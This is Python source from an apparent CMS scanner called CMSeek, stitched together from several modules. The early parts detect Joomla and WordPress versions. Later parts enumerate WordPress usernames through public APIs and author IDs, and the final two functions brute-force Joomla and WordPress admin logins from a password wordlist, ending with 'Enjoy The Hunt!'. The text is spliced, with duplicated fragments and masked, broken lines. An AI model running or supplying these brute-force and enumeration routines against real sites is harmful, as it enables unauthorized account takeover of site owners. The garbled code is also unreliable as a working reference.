cmseek.fgreen + cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',
cka['name']) # update log
cmseek.result(
'', "CMS Link: " + cmseek.bold +
cmseek.fgreen + cka['url'] + cmseek.cln)
cmseek.update_log('cms_url',
cka['url']) # update log
else:
cmseek.statement(
"CMS Version is detectable, detecting CMS Version"
)
### Detect version
print('\n')
cmseek.result(
'', "CMS Name: " + cmseek.bold +
cmseek.fgreen + cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',
cka['name']) # update log
cmseek.result(
'', "CMS Link: " + cmseek.bold +
cmseek.fgreen + cka['url'] + cmseek.cln)
cmseek.update_log('cms_url',
cka['url']) # update log
return
else:
advanced.deep(c22[1], site, cua, '1', scode)
elif c22[0] == '2': # Empty Source code
cmseek.error("Source code was empty... exiting CMSeek")
return
else:
cmseek.error(
"Couldn't detect cms... :( \n Sorry master didn't mean to dissapoint but bye for now \n Can't handle this much disappintment \n\n"
)
return
else:
cmseek.warning(
"Generator meta tag not found! (Procceeding with scan 2.2 of 2.2)"
)
ga = '0' ## Generator meta tag not found as i freakin said earlier this will come in handy later
c22 = source.check(scode, site)
if c22[0] == '1':
cmseek.success(
"CMS Detected, CMS ID: \"%s\" - looking up database for CMS information"
% c22[1])
cmseek.update_log('detection_param', 'source') # update log
cmseek.update_log('cms_id', c22[1]) # update log
cka = getattr(cmsdb, c22[1])
if cka['deeps'] != '1': # Deep Scan not available
if cka['vd'] != '1': # Version Detection not available for the cms show basic stuff
print('\n')
cmseek.result(
'', "CMS Name: " + cmseek.bold + cmseek.fgreen +
cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',
cka['name']) # update log
cmseek.result(
'', "CMS Link: " + cmseek.bold + cmseek.fgreen +
cka['url'] + cmseek.cln)
cmseek.update_log('cms_url', cka['url']) # update log
else:
cmseek.statement(
"CMS Version is detectable, detecting CMS Version")
### Detect version
print('\n')
cmseek.result(
'', "CMS Name: " + cmseek.bold + cmseek.fgreen +
cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',
cka['name']) # update log
cmseek.result(
'', "CMS Link: " + cmseek.bold + cmseek.fgreen +
cka['url'] + cmseek.cln)
cmseek.update_log('cms_url', cka['url']) # update log
return
else:
advanced.deep(c22[1], site, cua, '0', scode)
elif c22[0] == '2': # Empty Source code
cmseek.error("Source code was empty... exiting CMSeek")
return
else:
cmseek.error(
"Couldn't detect cms... :( \n Sorry master didn't mean to dissapoint but bye for now \n Can't handle this much disappintment \n\n"
)
return
def start(id, url, ua, ga, source):
version = '0'
cmseek.info('detecting joomla version')
# version detection stats here
if ga == '1':
# Detect version via generator meta tag
cmseek.statement('Detecting version using generator meta tag [Method 1 of 4]')
regex_1 = re.findall(r'content=(?:\"|\')Joomla! (.*?) - Open Source Content Management(?:\"|\')', source)
if regex_1 != []:
cmseek.success('Joomla version detected, version: ' + cmseek.bold + regex_1[0] + cmseek.cln)
return regex_1[0]
if version == '0':
# Detections using the xml files
xml_files = ['administrator/manifests/files/joomla.xml','language/en-GB/en-GB.xml','administrator/components/com_content/content.xml','administrator/components/com_plugins/plugins.xml','administrator/components/com_media/media.xml','mambots/content/moscode.xml']
cmseek.statement('Detecting version using xml files [Method 2 of 4]')
for xml_file in xml_files:
xml_source = cmseek.getsource(url + '/' + xml_file, ua)
if xml_source[0] == '1':
regex_2 = re.findall(r'<version>(.*?)</version>', xml_source[1])
if regex_2 != []:
cmseek.success('Joomla version detected, version: ' + cmseek.bold + regex_2[0] + cmseek.cln)
return regex_2[0]
# Detection method 3
if version == '0':
other_files = ['language/en-GB/en-GB.xml','templates/system/css/system.css','media/system/js/mootools-more.js','language/en-GB/en-GB.ini','htaccess.txt','language/en-GB/en-GB.com_media.ini']
cmseek.statement('Detecting version using advanced fingerprinting [Method 3 of 4]')
for file in other_files:
file_source = cmseek.getsource(url + '/' + file, ua)
if file_source[0] == '1':
# Regex find
regex_3 = re.findall(r'<meta name="Keywords" content="(.*?)">', file_source[1])
if regex_3 != []:
cmseek.success('Joomla version detected, version: ' + cmseek.bold + regex_3[0] + cmseek.cln)
return regex_3[0]
# Joomla version 1.6
j16 = ['system.css 20196 2011-01-09 02:40:25Z ian','MooTools.More={version:"1.3.0.1"','en-GB.ini 20196 2011-01-09 02:40:25Z ian','en-GB.ini 20990 2011-03-18 16:42:30Z infograf768','20196 2011-01-09 02:40:25Z ian']
for j in j16:
rsearch = re.search(j,file_source[1])
if rsearch is not None:
cmseek.success('Joomla version detected, version: ' + cmseek.bold + '1.6' + cmseek.cln)
return '1.6'
# Joomla version 1.5
j15 = ['Joomla! 1.5','MooTools={version:\'1.12\'}','11391 2009-01-04 13:35:50Z ian']
for j in j15:
rsearch = re.search(j,file_source[1])
if rsearch is not None:
cmseek.success('Joomla version detected, version: ' + cmseek.bold + '1.5' + cmseek.cln)
return '1.5'
# Joomla version 1.7
j17 = ['system.css 21322 2011-05-11 01:10:29Z dextercowley','MooTools.More={version:"1.3.2.1"','22183 2011-09-30 09:04:32Z infograf768','21660 2011-06-23 13:25:32Z infograf768']
for j in j17:
rsearch = re.search(j,file_source[1])
if rsearch is not None:
cmseek.success('Joomla version detected, version: ' + cmseek.bold + '1.7' + cmseek.cln)
return '1.7'
# Joomla version 1.0
j10 = ['(Copyright (C) 2005 - 200(6|7))','47 2005-09-15 02:55:27Z rhuk','423 2005-10-09 18:23:50Z stingrey','1005 2005-11-13 17:33:59Z stingrey','1570 2005-12-29 05:53:33Z eddieajau','2368 2006-02-14 17:40:02Z stingrey','1570 2005-12-29 05:53:33Z eddieajau','4085 2006-06-21 16:03:54Z stingrey','4756 2006-08-25 16:07:11Z stingrey','5973 2006-12-11 01:26:33Z robs','5975 2006-12-11 01:26:33Z robs']
for j in j10:
rsearch = re.search(j,file_source[1])
if rsearch is not None:
cmseek.success('Joomla version detected, version: ' + cmseek.bold + '1.0' + cmseek.cln)
return '1.0'
# Joomla version 2.5
j25 = ['Copyright (C) 2005 - 2012 Open Source Matters','MooTools.More={version:"1.4.0.1"']
for j in j25:
rsearch = re.search(j,file_source[1])
if rsearch is not None:
cmseek.success('Joomla version detected, version: ' + cmseek.bold + '2.5' + cmseek.cln)
return '2.5'
# Detection using README file
if version == '0':
cmseek.statement('Detecting version from README file [Method 4 of 4]')
readme_file = url + '/README.txt'
readme_source = cmseek.getsource(readme_file, ua)
if readme_source[0] == '1':
regex_4 = re.findall(r'package to version (.*?)', readme_source[1])
if regex_4 != []:
cmseek.success('Joomla version detected, version: ' + cmseek.bold + regex_4[0] + cmseek.cln)
return regex_4[0]
# if we fail ¯\_(ツ)_/¯
return version
def main_proc(site,cua):
cmseek.clearscreen()
cmseek.banner("CMS Detection And Deep Scan")
cmseek.info("Scanning Site: " + site)
cmseek.statement("User Agent: " + cua)
cmseek.statement("Collecting Headers and Page Source for Analysis")
init_source = cmseek.getsource(site, cua)
if init_source[0] != '1':
cmseek.error("Aborting CMSeek! Couldn't connect to site \n Error: %s" % init_source[1])
return
else:
scode = init_source[1]
headers = init_source[2]
if site != init_source[3] and site + '/' != init_source[3]:
cmseek.info('Target redirected to: ' + cmseek.bold + cmseek.fgreen + init_source[3] + cmseek.cln)
follow_redir = input('[#] Set ' + cmseek.bold + cmseek.fgreen + init_source[3] + cmseek.cln + ' as target? (y/n): ')
if follow_redir.lower() == 'y':
site = init_source[3]
cmseek.statement("Detection Started")
cmseek.statement("Using headers to detect CMS (Stage 1 of 2)")
c1 = header.check(headers)
if c1[0] == "1":
# Do this shit later
cmseek.success("CMS Detected, CMS ID: \"%s\" - looking up database for CMS information" % c1[1])
cmseek.update_log('detection_param','header') # update log
cmseek.update_log('cms_id',c1[1]) # update log
cka = getattr(cmsdb, c1[1])
if cka['deeps'] != '1': # Deep Scan
if cka['vd'] != '1': # Version Detection not available for the cms show basic stuff
print('\n')
cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',cka['name']) # update log
cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
cmseek.update_log('cms_url',cka['url']) # update log
else:
cmseek.statement("CMS Version is detectable, detecting CMS Version")
### Detect version
cms_version = version_detect.start(c1[1], site, cua, '1', scode)
print('\n')
cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',cka['name']) # update log
if cms_version != '0':
cmseek.result('',"CMS Version: " + cmseek.bold + cmseek.fgreen + cms_version + cmseek.cln)
cmseek.update_log('cms_version',cms_version) # update log
cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
cmseek.update_log('cms_url',cka['url']) # update log
# return
else:
advanced.start(c1[1], site, cua, '2', scode) ## The 2 suggests that generator check has not been performed
else:
cmseek.warning('No luck with headers... Continuing with source code')
cmseek.statement("Checking for generator meta tag in source code")
if 'Generator' in scode or 'generator' in scode:
cmseek.success("Generator meta tag found.. Continuing with detection (2.1 of 2.2)")
ga = "1" ## Generator tag found .. this will come in handy later to save us some milliseconds ;)
c21 = source.generator(scode)
if c21[0] == '1':
cmseek.success("CMS Detected, CMS ID: \"%s\" - looking up database for CMS information" % c21[1])
cmseek.update_log('detection_param','generator') # update log
cmseek.update_log('cms_id',c21[1]) # update log
cka = getattr(cmsdb, c21[1])
if cka['deeps'] != '1': # Deep Scan not available
if cka['vd'] != '1': # Version Detection not available for the cms show basic stuff
print('\n')
cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',cka['name']) # update log
cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
cmseek.update_log('cms_url',cka['url']) # update log
else:
cmseek.statement("CMS Version is detectable, detecting CMS Version")
### Detect version
cms_version = version_detect.start(c21[1], site, cua, '1', scode)
print('\n')
cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',cka['name']) # update log
if cms_version != '0':
cmseek.result('',"CMS Version: " + cmseek.bold + cmseek.fgreen + cms_version + cmseek.cln)
cmseek.update_log('cms_version',cms_version) # update log
cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
cmseek.update_log('cms_url',cka['url']) # update log
# return
else:
advanced.start(c21[1], site, cua, '1', scode)
elif c21[0] == '2': # Empty Source code
cmseek.error("Source code was empty... exiting CMSeek")
# return
else: ## CMS Detection unsuccessful via generator meta tag
cmseek.warning('Could not detect CMS from the generator meta tag, (Procceeding with scan 2.2 of 2.2)')
c22 = source.check(scode, site)
if c22[0] == '1':
cmseek.success("CMS Detected, CMS ID: \"%s\" - looking up database for CMS information" % c22[1])
cmseek.update_log('detection_param','source') # update log
cmseek.update_log('cms_id',c22[1]) # update log
cka = getattr(cmsdb, c22[1])
if cka['deeps'] != '1': # Deep Scan not available
if cka['vd'] != '1': # Version Detection not available for the cms show basic stuff
print('\n')
cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',cka['name']) # update log
cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
cmseek.update_log('cms_url',cka['url']) # update log
else:
cmseek.statement("CMS Version is detectable, detecting CMS Version")
cms_version = version_detect.start(c22[1], site, cua, '1', scode)
### Detect version
print('\n')
cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',cka['name']) # update log
if cms_version != '0':
cmseek.result('',"CMS Version: " + cmseek.bold + cmseek.fgreen + cms_version + cmseek.cln)
cmseek.update_log('cms_version',cms_version) # update log
cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
cmseek.update_log('cms_url',cka['url']) # update log
return
else:
advanced.start(c22[1], site, cua, '1', scode)
elif c22[0] == '2': # Empty Source code
cmseek.error("Source code was empty... exiting CMSeek")
return
else:
cmseek.error("Couldn't detect cms... :( \n Sorry master didn't mean to dissapoint but bye for now \n Can't handle this much disappintment \n\n")
return
else:
cmseek.warning("Generator meta tag not found! (Procceeding with scan 2.2 of 2.2)")
ga = '0' ## Generator meta tag not found as i freakin said earlier this will come in handy later
c22 = source.check(scode, site)
if c22[0] == '1':
cmseek.success("CMS Detected, CMS ID: \"%s\" - looking up database for CMS information" % c22[1])
cmseek.update_log('detection_param','source') # update log
cmseek.update_log('cms_id',c22[1]) # update log
cka = getattr(cmsdb, c22[1])
if cka['deeps'] != '1': # Deep Scan not available
if cka['vd'] != '1': # Version Detection not available for the cms show basic stuff
print('\n')
cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',cka['name']) # update log
cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
cmseek.update_log('cms_url',cka['url']) # update log
else:
cmseek.statement("CMS Version is detectable, detecting CMS Version")
cms_version = version_detect.start(c22[1], site, cua, '0', scode)
### Detect version
print('\n')
cmseek.result('',"CMS Name: " + cmseek.bold + cmseek.fgreen + cka['name'] + cmseek.cln)
cmseek.update_log('cms_name',cka['name']) # update log
if cms_version != '0':
cmseek.result('',"CMS Version: " + cmseek.bold + cmseek.fgreen + cms_version + cmseek.cln)
cmseek.update_log('cms_version',cms_version) # update log
cmseek.result('',"CMS Link: " + cmseek.bold + cmseek.fgreen + cka['url'] + cmseek.cln)
cmseek.update_log('cms_url',cka['url']) # update log
return
else:
advanced.start(c22[1], site, cua, '0', scode)
elif c22[0] == '2': # Empty Source code
cmseek.error("Source code was empty... exiting CMSeek")
return
else:
cmseek.error("Couldn't detect cms... :( \n Sorry master didn't mean to dissapoint but bye for now \n Can't handle this much disappintment \n\n")
return
def deep(
id, url, ua, ga, source
): ## ({ID of the cms}, {url of target}, {User Agent}, {is Generator Meta tag available [0/1]}, {Source code})
## Do shits later [update from later: i forgot what shit i had to do ;___;]
if id == "wp":
cmseek.statement('Starting WordPress DeepScan')
# Version detection
cmseek.statement('Detecting Version and vulnerabilities')
if ga == '1' or ga == '2' or ga == '3': ## something good was going to happen but my sleep messed it up TODO: will fix it later
cmseek.statement(
'Generator Tag Available... Trying version detection using generator meta tag'
)
rr = re.findall(
r'<meta name=\"generator\" content=\"WordPress (.*?)\"',
source)
if rr != []:
version = rr[0]
cmseek.success("Version Detected, WordPress Version %s" %
version)
else:
cmseek.warning(
"Generator tag was a big failure.. looking up /feed/")
fs = cmseek.getsource(url + '/feed/', ua)
if fs[0] != '1': # Something messed up real bad
cmseek.warning("Couldn't get feed source code, Error: %s" %
fs[1])
else:
fv = re.findall(
r'<generator>https://wordpress.org/\?v=(.*?)</generator>',
fs[1])
if fv != []: # Not empty good news xD
version = fv[0]
cmseek.success(
"Version Detected, WordPress Version %s" % version)
else:
cmseek.warning(
"Well even feed was a failure... let's lookup wp-links-opml then"
)
opmls = cmseek.getsource(url + '/wp-links-opml.php',
ua)
if opmls[0] != '1': # Something messed up real bad
cmseek.warning(
"Couldn't get wp-links-links source code, Error: %s"
% opmls[1])
else:
fv = re.findall(r'generator=\"wordpress/(.*?)\"',
opmls[1])
if fv != []: # Not empty good news xD || you can guess it's copied right?
version = fv[0]
cmseek.success(
"Version Detected, WordPress Version %s" %
version)
else:
## new version detection methods will be added in the future updates
cmseek.error(
"Couldn't Detect Version :( Sorry Master")
version = '0'
## Check for minor stuffs like licesnse readme and some open directory checks
cmseek.statement("Initiationg open directory and files check")
## Readme.html
readmesrc = cmseek.getsource(url + '/readme.html', ua)
if readmesrc[
0] != '1': ## something went wrong while getting the source codes
cmseek.warning(
"Couldn't get readme file's source code most likely it's not present"
)
readmefile = '0' # Error Getting Readme file
elif 'Welcome. WordPress is a very special project to me.' in readmesrc[
1]:
readmefile = '1' # Readme file present
else:
readmefile = '2' # Readme file found but most likely it's not of wordpress
## license.txt
licsrc = cmseek.getsource(url + '/license.txt', ua)
if licsrc[0] != '1':
cmseek.warning('license file not found')
licfile = '0'
elif 'WordPress - Web publishing software' in licsrc[1]:
licfile = '1'
else:
licfile = '2'
## wp-content/uploads/ folder
wpupsrc = cmseek.getsource(url + '/wp-content/uploads/', ua)
if wpupsrc[0] != '1':
wpupdir = '0'
elif 'Index of /wp-content/uploads' in wpupsrc[1]:
wpupdir = '1'
else:
wpupdir = '2'
## xmlrpc
xmlrpcsrc = cmseek.getsource(url + '/xmlrpc.php', ua)
if xmlrpcsrc[0] != '1':
cmseek.warning('XML-RPC interface not available')
xmlrpc = '0'
elif 'XML-RPC server accepts POST requests only.' in xmlrpcsrc[1]:
xmlrpc = '1'
else:
xmlrpc = '2'
## User enumeration
cmseek.info("Starting Username Harvest")
# User enumertion via site's json api
cmseek.info('Harvesting usernames from wp-json api')
wpjsonuser = []
wpjsonsrc = cmseek.getsource(url + '/wp-json/wp/v2/users', ua)
if wpjsonsrc[0] != "1" or 'slug' not in wpjsonsrc[1]:
cmseek.warning("Json api method failed trying with next")
else:
for user in json.loads(wpjsonsrc[1]):
wpjsonuser.append(user['slug'])
cmseek.success("Found User: %s" % user['slug'])
# user enumertion vua jetpack api
cmseek.info('Harvesting usernames from jetpack public api')
jpapiuser = []
strippedurl = url.replace('http://', '')
strippedurl = strippedurl.replace(
'https://',
'') # Pretty sure it is an ugly solution but oh well
jpapisrc = cmseek.getsource(
'https://public-api.wordpress.com/rest/v1.1/sites/' +
strippedurl + '/posts?number=100&pretty=true&fields=author',
ua)
if jpapisrc[0] != '1' or 'login' not in jpapisrc[1]:
cmseek.warning(
'No results from jetpack api... maybe the site doesn\'t use jetpack'
)
else:
for user in json.loads(jpapisrc[1])['posts']:
jpapiuser.append(user['author']['login'])
cmseek.success("Found User: %s" % user['author']['login'])
jpapiuser = list(set(
usr.strip()
for usr in jpapiuser)) # Removing duplicate usernames
# the regular way of checking vua user Parameter -- For now just check upto 20 ids
cmseek.info('Harvesting usernames from wordpress author Parameter')
wpparamuser = []
usrrange = range(31)
pool = multiprocessing.Pool()
prepareenum = partial(wpauthorenum, ua, url)
res = pool.map(prepareenum, usrrange)
for r in res:
if r != None:
wpparamuser.append(r)
# Combine all the usernames that we collected
usernames = set(wpjsonuser + jpapiuser + wpparamuser)
if len(usernames) > 0:
usernamesgen = '1' # Some usernames were harvested
cmseek.success(cmseek.bold + str(len(usernames)) +
" Usernames" + cmseek.cln +
" was / were enumerated")
else:
usernamesgen = '0' # Failure
cmseek.warning("Couldn't enumerate usernames :( ")
## Version Vulnerability Detection
if version == "0":
cmseek.warning(
"Skipping version vulnerability scan as WordPress Version wasn't detected"
)
else: ## So we have a version let's scan for vulnerabilities
cmseek.info(
"Checking version vulnerabilities [props to wpvulndb for their awesome api ;)]"
)
vfc = version.replace(
'.', ''
) # NOT IMPORTANT: vfc = version for check well we have to kill all the .s in the version for looking it up on wpvulndb.. kinda weird if you ask me
ws = cmseek.getsource(
"https://wpvulndb.com/api/v2/wordpresses/" + vfc, ua)
print(ws[0])
if ws[0] == "1":
# wjson = json.loads(ws[1]) + vfd + "['release_date']"
wpvdbres = '1' ## We have the wpvulndb results
result = json.loads(ws[1])[version]
else:
wpvdbres = '0'
cmseek.error('Error Retriving data from wpvulndb')
### Deep Scan Results comes here
cmseek.clearscreen()
cmseek.banner("Deep Scan Results")
cmseek.result("Detected CMS: ", 'WordPress')
cmseek.update_log('cms_name', 'WordPress') # update log
cmseek.result("CMS URL: ", "https://wordpress.org")
cmseek.update_log('cms_url', "https://wordpress.org") # update log
if version != '0':
cmseek.result("Version: ", version)
cmseek.update_log('wp_version', version)
if wpvdbres == '1':
cmseek.result("Changelog URL: ", str(result['changelog_url']))
cmseek.update_log('wp_changelog_file',
str(result['changelog_url']))
if readmefile == '1':
cmseek.result("Readme file found: ", url + '/readme.html')
cmseek.update_log('wp_readme_file', url + '/readme.html')
if licfile == '1':
cmseek.result("License file found: ", url + '/license.txt')
if wpupdir == '1':
cmseek.result("Uploads directory has listing enabled: ",
url + '/wp-content/uploads')
cmseek.update_log('wp_uploads_directory',
url + '/wp-content/uploads')
if xmlrpc == '1':
cmseek.result("XML-RPC interface available: ", url + '/xmlrpc.php')
cmseek.update_log('wp_uploads_directory', url + '/xmlrpc.php')
if usernamesgen == '1':
cmseek.result("Usernames Harvested: ", '')
wpunames = ""
for u in usernames:
wpunames = wpunames + u + ","
cmseek.success(cmseek.bold + u + cmseek.cln)
print('\n')
cmseek.update_log('wp_users', wpunames)
if wpvdbres == '1':
cmseek.result("Vulnerability Count: ",
str(len(result['vulnerabilities'])))
cmseek.update_log('wp_vuln_count',
str(len(result['vulnerabilities'])))
cmseek.update_log('wpvulndb_url',
"https://wpvulndb.com/api/v2/wordpresses/" + vfc)
if len(result['vulnerabilities']) > 0:
cmseek.success("Displaying all the vulnerabilities")
for vuln in result['vulnerabilities']:
print("\n")
cmseek.result("Vulnerability Title: ", str(vuln['title']))
cmseek.result("Vulnerability Type: ",
str(vuln['vuln_type']))
cmseek.result("Fixed In Version: ", str(vuln['fixed_in']))
cmseek.result(
"Vulnerability Link: ",
"http://wpvulndb.com/vulnerabilities/" +
str(vuln['id']))
strvuln = str(vuln)
if 'cve' in strvuln:
for ref in vuln['references']['cve']:
cmseek.result(
"Vulnerability CVE: ",
"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-"
+ str(ref))
if 'exploitdb' in strvuln:
for ref in vuln['references']['exploitdb']:
cmseek.result(
"ExploitDB Link: ",
"http://www.exploit-db.com/exploits/" +
str(ref))
if 'metasploit' in strvuln:
for ref in vuln['references']['metasploit']:
cmseek.result(
"Metasploit Module: ",
"http://www.metasploit.com/modules/" +
str(ref))
if 'osvdb' in strvuln:
for ref in vuln['references']['osvdb']:
cmseek.result("OSVDB Link: ",
"http://osvdb.org/" + str(ref))
if 'secunia' in strvuln:
for ref in vuln['references']['secunia']:
cmseek.result(
"Secunia Advisory: ",
"http://secunia.com/advisories/" + str(ref))
if 'url' in strvuln:
for ref in vuln['references']['url']:
cmseek.result("Vulnerability Reference: ",
str(ref))
return
else:
cmseek.warning(
"No Vulnerabilities discovered in this version of WordPress as of yet"
)
return
return
def start():
cmseek.clearscreen()
cmseek.banner("Joomla Bruteforce Module")
url = cmseek.targetinp("") # input('Enter Url: ')
cmseek.info("Checking for Joomla")
bsrc = cmseek.getsource(url, cmseek.randomua('foodislove'))
joomcnf = '0'
if bsrc[0] != '1':
cmseek.error("Could not get target source, CMSeek is quitting")
cmseek.handle_quit()
else:
## Parse generator meta tag
parse_generator = generator.parse(bsrc[1])
ga = parse_generator[0]
ga_content = parse_generator[1]
try1 = generator.scan(ga_content)
if try1[0] == '1' and try1[1] == 'joom':
joomcnf = '1'
else:
try2 = source.check(bsrc[1], url)
if try2[0] == '1' and try2[1] == 'joom':
joomcnf = '1'
else:
try3 = header.check(bsrc[2]) # Headers Check!
if try3[0] == '1' and try3[1] == 'joom':
joomcnf = '1'
else:
joomcnf = '0'
if joomcnf != '1':
cmseek.error('Could not confirm Joomla... CMSeek is quitting')
cmseek.handle_quit()
else:
cmseek.success(
"Joomla Confirmed... Confirming form and getting token...")
joomloginsrc = cmseek.getsource(url + '/administrator/index.php',
cmseek.randomua('thatsprettygay'))
if joomloginsrc[0] == '1' and '<form' in joomloginsrc[1]:
# joomtoken = re.findall(r'type=\"hidden\" name=\"(.*?)\" value=\"1\"', joomloginsrc[1])
# if len(joomtoken) == 0:
# cmseek.error('Unable to get token... CMSeek is quitting!')
# cmseek.handle_quit()
# cmseek.success("Token grabbed successfully: " + cmseek.bold + joomtoken[0] + cmseek.cln)
# token = joomtoken[0]
joomparamuser = []
rawuser = input(
"[~] Enter Usernames with coma as separation without any space (example: cris,harry): "
).split(',')
for rusr in rawuser:
joomparamuser.append(rusr)
joombruteusers = set(
joomparamuser
) ## Strip duplicate usernames in case any smartass didn't read the full thing and entered admin as well
for user in joombruteusers:
passfound = '0'
print('\n')
cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
passwords = pwd_file.read().split('\n')
passwords.insert(0, user)
for password in passwords:
if password != '' and password != '\n':
sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
sys.stdout.flush()
# print("Testing Pass: "******"Ret URL: " + str(cursrc[3]))
if 'logout' in str(cursrc[1]):
print('\n')
cmseek.success('Password found!')
print(" |\n |--[username]--> " + cmseek.bold +
user + cmseek.cln +
"\n |\n |--[password]--> " + cmseek.bold +
password + cmseek.cln + "\n |")
cmseek.success('Enjoy The Hunt!')
cmseek.savebrute(url,
url + '/administrator/index.php',
user, password)
passfound = '1'
break
else:
continue
break
if passfound == '0':
cmseek.error('\n\nCould Not find Password!')
print('\n\n')
else:
cmseek.error("Couldn't find login form... CMSeeK is quitting")
cmseek.handle_quit()
def start():
cmseek.clearscreen()
cmseek.banner("WordPress Bruteforce Module")
url = cmseek.targetinp("") # input('Enter Url: ')
cmseek.info("Checking for WordPress")
bsrc = cmseek.getsource(
url,
cmseek.randomua('thiscanbeanythingasfarasnowletitbewhatilovethemost'))
if bsrc[0] != '1':
# print(bsrc[1])
cmseek.error("Could not get target source, CMSeek is quitting")
cmseek.handle_quit()
else:
## Parse generator meta tag
parse_generator = generator.parse(bsrc[1])
ga = parse_generator[0]
ga_content = parse_generator[1]
try1 = generator.scan(ga_content)
if try1[0] == '1' and try1[1] == 'wp':
wpcnf = '1'
else:
try2 = source.check(bsrc[1], url)
if try2[0] == '1' and try2[1] == 'wp':
wpcnf = '1'
else:
wpcnf = '0'
if wpcnf != '1':
print(bsrc[1])
cmseek.error('Could not confirm WordPress... CMSeek is quitting')
cmseek.handle_quit()
else:
cmseek.success(
"WordPress Confirmed... Checking for WordPress login form")
wploginsrc = cmseek.getsource(url + '/wp-login.php',
cmseek.randomua('thatsprettygay'))
if wploginsrc[0] == '1' and '<form' in wploginsrc[1]:
cmseek.success(
"Login form found.. Detecting Username For Bruteforce")
wpparamuser = []
uenum = wp_user_enum.start('wp', url, cmseek.randomua('r'), '0',
bsrc[1])
usernamesgen = uenum[0]
wpparamuser = uenum[1]
if wpparamuser == []:
customuser = input(
"[~] CMSeek could not enumerate usernames, enter username if you know any: "
)
if customuser == "":
cmseek.error("No user found, CMSeek is quitting")
else:
wpparamuser.append(customuser)
wpbruteusers = set(wpparamuser)
for user in wpbruteusers:
passfound = '0'
print('\n')
cmseek.info("Bruteforcing User: "******"wordlist/passwords.txt", "r")
passwords = pwd_file.read().split('\n')
passwords.insert(0, user)
for password in passwords:
if password != '' and password != '\n':
sys.stdout.write('[*] Testing Password: '******'%s\r\r' % password)
sys.stdout.flush()
cursrc = cmseek.wpbrutesrc(url, user, password)
if 'wp-admin' in str(cursrc[3]):
cmseek.success('Password found!')
print(" |\n |--[username]--> " + cmseek.bold +
user + cmseek.cln +
"\n |\n |--[password]--> " + cmseek.bold +
password + cmseek.cln + "\n |")
cmseek.success('Enjoy The Hunt!')
cmseek.savebrute(url, url + '/wp-login.php', user,
password)
passfound = '1'
break
else:
continue
break
if passfound == '0':
cmseek.error('\n\nCould Not find Password!')
print('\n\n')
else:
cmseek.error("Couldn't find login form... CMSeeK is quitting")
# print(wploginsrc[1])
cmseek.handle_quit()
